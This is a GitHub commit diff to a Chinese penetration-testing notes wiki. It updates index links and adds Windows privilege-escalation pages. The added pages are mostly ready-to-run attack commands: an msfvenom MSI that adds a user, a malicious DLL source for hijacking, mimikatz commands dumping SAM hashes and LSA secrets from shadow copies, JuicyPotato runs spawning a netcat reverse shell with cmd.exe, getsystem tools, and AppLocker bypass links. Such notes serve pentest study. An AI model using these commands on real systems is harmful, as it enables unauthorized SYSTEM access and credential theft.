update EoP

sunlandli · Jun 16, 2022 · 9bb5859 · 9bb5859
1 parent fa94506
commit 9bb5859
Show file tree

Hide file tree

Showing 32 changed files with 479 additions and 33 deletions.
diff --git a/wiki/README.md b/wiki/README.md
@@ -127,7 +127,7 @@
     - [RDP&Firewall](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/README.md)
       - [爆破RDP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/爆破RDP.md)
       - [注册表开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注册表开启.md)
-      - [Netsh启动服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/Netsh启动服务.md)
+      - [防火墙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/防火墙.md)
       - [注入点开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注入点开启.md)
       - [MSF开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/MSF开启.md)
       - [wmic开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/wmic开启.md)
@@ -151,7 +151,7 @@
     - [PowerUp](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/PowerUp.md)
     - [Runas](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Runas.md)
     - [令牌窃取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/令牌窃取.md)
-    - [Trusted-Service-Paths](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Trusted-Service-Paths.md)
+    - [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
     - [Vulnerable-Services](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Vulnerable-Services.md)
     - [DNS组到DomainAdmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DNS组到DomainAdmin.md)
     - [HiveNightmare](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/HiveNightmare.md)
@@ -162,6 +162,23 @@
     - [SpoolFool](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SpoolFool.md)
     - [弱注册表权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱注册表权限.md)
     - [CVE-2020-1472](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/CVE-2020-1472.md)
+    - [AppLocker](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/AppLocker.md)
+    - [DLL劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DLL劫持.md)
+    - [EFSPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/EFSPotato.md)
+    - [JuicyPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/JuicyPotato.md)
+    - [RoguePotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RoguePotato.md)
+    - [watson](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/watson.md)
+    - [WSL子系统](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/WSL子系统.md)
+    - [本机文件和脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/本机文件和脚本.md)
+    - [不安全的GUI应用程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/不安全的GUI应用程序.md)
+    - [从administrator到system](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/从administrator到system.md)
+    - [打印机漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/打印机漏洞.md)
+    - [服务中的不正确权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/服务中的不正确权限.md)
+    - [环境变量优先](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/环境变量优先.md)
+    - [恢复服务帐户的权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/恢复服务帐户的权限.md)
+    - [弱权限的PATH目录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱权限的PATH目录.md)
+    - [特权文件写入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/特权文件写入.md)
+    - [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
   - [Linux提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/README.md)
     - [查找辅助信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找辅助信息.md)
     - [查找可能泄露的密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找可能泄露的密码.md)

diff --git a/wiki/权限提升/README.md b/wiki/权限提升/README.md
@@ -2,7 +2,7 @@
   - [RDP&Firewall](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/README.md)
     - [爆破RDP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/爆破RDP.md)
     - [注册表开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注册表开启.md)
-    - [Netsh启动服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/Netsh启动服务.md)
+    - [防火墙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/防火墙.md)
     - [注入点开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注入点开启.md)
     - [MSF开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/MSF开启.md)
     - [wmic开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/wmic开启.md)
@@ -26,7 +26,7 @@
   - [PowerUp](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/PowerUp.md)
   - [Runas](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Runas.md)
   - [令牌窃取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/令牌窃取.md)
-  - [Trusted-Service-Paths](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Trusted-Service-Paths.md)
+  - [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
   - [Vulnerable-Services](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Vulnerable-Services.md)
   - [DNS组到DomainAdmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DNS组到DomainAdmin.md)
   - [HiveNightmare](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/HiveNightmare.md)
@@ -37,6 +37,23 @@
   - [SpoolFool](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SpoolFool.md)
   - [弱注册表权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱注册表权限.md)
   - [CVE-2020-1472](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/CVE-2020-1472.md)
+  - [AppLocker](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/AppLocker.md)
+  - [DLL劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DLL劫持.md)
+  - [EFSPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/EFSPotato.md)
+  - [JuicyPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/JuicyPotato.md)
+  - [RoguePotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RoguePotato.md)
+  - [watson](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/watson.md)
+  - [WSL子系统](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/WSL子系统.md)
+  - [本机文件和脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/本机文件和脚本.md)
+  - [不安全的GUI应用程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/不安全的GUI应用程序.md)
+  - [从administrator到system](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/从administrator到system.md)
+  - [打印机漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/打印机漏洞.md)
+  - [服务中的不正确权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/服务中的不正确权限.md)
+  - [环境变量优先](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/环境变量优先.md)
+  - [恢复服务帐户的权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/恢复服务帐户的权限.md)
+  - [弱权限的PATH目录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱权限的PATH目录.md)
+  - [特权文件写入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/特权文件写入.md)
+  - [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
 - [Linux提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/README.md)
   - [查找辅助信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找辅助信息.md)
   - [查找可能泄露的密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找可能泄露的密码.md)

diff --git a/wiki/权限提升/Windows提权/AlwaysInstallElevated提权.md b/wiki/权限提升/Windows提权/AlwaysInstallElevated提权.md
@@ -1,11 +1,17 @@
 	>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 	>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+
+	PS > Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
+	PS > Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
 	为1 检测是否永远以高权限启动安装
 	#HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
 	新建DWORD32 DisableMSI=0
-	>>msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi
-	>>upload /root/add.msi c:\\1.msi
+	>msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi
+	>msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi-nouac -o /root/add.msi
+	>upload /root/add.msi c:\\1.msi
 	>msiexec /quiet /qn /i c:\1.msi
 	MSF
 	>use exploit/windows/local/always_install_elevated
 	>set session 1
+	PowerUp
+	Get-RegistryAlwaysInstallElevated,Write-UserAddMSI
diff --git a/wiki/权限提升/Windows提权/AppLocker.md b/wiki/权限提升/Windows提权/AppLocker.md
@@ -0,0 +1,9 @@
+	GPO
+	HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2（keys：Appx、Dll、Exe、Msi 和脚本）。
+	列出 AppLocker 规则
+	PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
+	AppLocker 绕过
+	默认情况下，C:\Windows不被阻止，C:\Windows\Tasks任何用户都可以写
+	https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
+	https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
+	https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
diff --git a/wiki/权限提升/Windows提权/DLL劫持.md b/wiki/权限提升/Windows提权/DLL劫持.md
@@ -0,0 +1,18 @@
+	以管理员/SYSTEM 身份运行且文件权限不正确的服务可能允许提权。可以替换文件，重新启动服务并获取系统权限。
+	查找缺少的 DLL 
+	- Find-PathDLLHijack PowerUp.ps1
+	- Process Monitor : check for "Name Not Found"
+
+	编译一个恶意 dll
+	- For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+	- For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+
+	windows_dll.c的内容
+	#include <windows.h>
+	BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+	    if (dwReason == DLL_PROCESS_ATTACH) {
+	        system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
+	        ExitProcess(0);
+	    }
+	    return TRUE;
+	}
diff --git a/wiki/权限提升/Windows提权/EFSPotato.md b/wiki/权限提升/Windows提权/EFSPotato.md
@@ -0,0 +1,8 @@
+	https://github.com/zcgonvh/EfsPotato
+	# .NET 4.x
+	csc EfsPotato.cs
+	csc /platform:x86 EfsPotato.cs
+
+	# .NET 2.0/3.5
+	C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
+	C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
diff --git a/wiki/权限提升/Windows提权/HiveNightmare.md b/wiki/权限提升/Windows提权/HiveNightmare.md
@@ -1,3 +1,8 @@
+	icacls检查漏洞
+	C:\Windows\System32> icacls config\SAM
+	config\SAM BUILTIN\Administrators:(I)(F)
+           NT AUTHORITY\SYSTEM:(I)(F)
+           BUILTIN\Users:(I)(RX)    <-- 这是错误的 - 普通用户不应该有读取权限!
 	https://github.com/GossiTheDog/HiveNightmare
 	执行成功会生成3个文件 SAM SECURITY SYSTEM
 	直接拿去导出密码
@@ -6,4 +11,15 @@
 	执行生成SAM和SYSTEM
 	或
 	https://github.com/FireFart/hivenightmare
-	直接执行生成3个文件SAM SECURITY SYSTEM
+	直接执行生成3个文件SAM SECURITY SYSTEM
+	mimikatz
+	mimikatz> token::whoami /full
+
+	列出可用的卷影副本
+	mimikatz> misc::shadowcopies
+
+	从 SAM 数据库中提取账户
+	mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
+
+	从 SECURITY 中提取密钥
+	mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
diff --git a/wiki/权限提升/Windows提权/JuicyPotato.md b/wiki/权限提升/Windows提权/JuicyPotato.md
@@ -0,0 +1,23 @@
+	Juicy Potato
+	如果机器>= Windows 10 1809 & Windows Server 2019 - 尝试Rogue Potato
+	如果机器< Windows 10 1809 < Windows Server 2019 - 尝试Juicy Potato
+	https://github.com/ohpe/juicy-potato/releases
+	检查服务帐户的权限，寻找SeImpersonate/或SeAssignPrimaryToken
+	whoami /priv
+	根据您的 Windows 版本选择 CLSID，CLSID 是标识 COM 类对象的全局唯一标识符
+	https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise
+	https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise
+	https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise
+	https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro
+	https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise
+	https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter
+	https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard
+	执行 JuicyPotato 以运行特权命令
+	>JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
+	>JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
+	>JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
+	    Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
+	    ......
+	    [+] authresult 0
+	    {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
+	    [+] CreateProcessWithTokenW OK
diff --git a/wiki/权限提升/Windows提权/MSF.md b/wiki/权限提升/Windows提权/MSF.md
@@ -2,3 +2,10 @@
 	>use post/windows/gather/enum_patches
 	列举可用EXP
 	>use post/multi/recon/local_exploit_suggester
+  ##### getsystem
+  	meterpreter> getsystem 
+  ##### getsystem替代者
+  	>Tokenvator.exe getsystem cmd.exe 
+	>incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
+	>psexec -s -i cmd.exe 
+	>python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
diff --git a/wiki/权限提升/Windows提权/RDP&Firewall/Netsh启动服务.md b/wiki/权限提升/Windows提权/RDP&Firewall/Netsh启动服务.md
diff --git a/wiki/权限提升/Windows提权/RDP&Firewall/README.md b/wiki/权限提升/Windows提权/RDP&Firewall/README.md
@@ -1,6 +1,6 @@
 - [爆破RDP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/爆破RDP.md)
 - [注册表开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注册表开启.md)
-- [Netsh启动服务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/Netsh启动服务.md)
+- [防火墙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/防火墙.md)
 - [注入点开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注入点开启.md)
 - [MSF开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/MSF开启.md)
 - [wmic开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/wmic开启.md)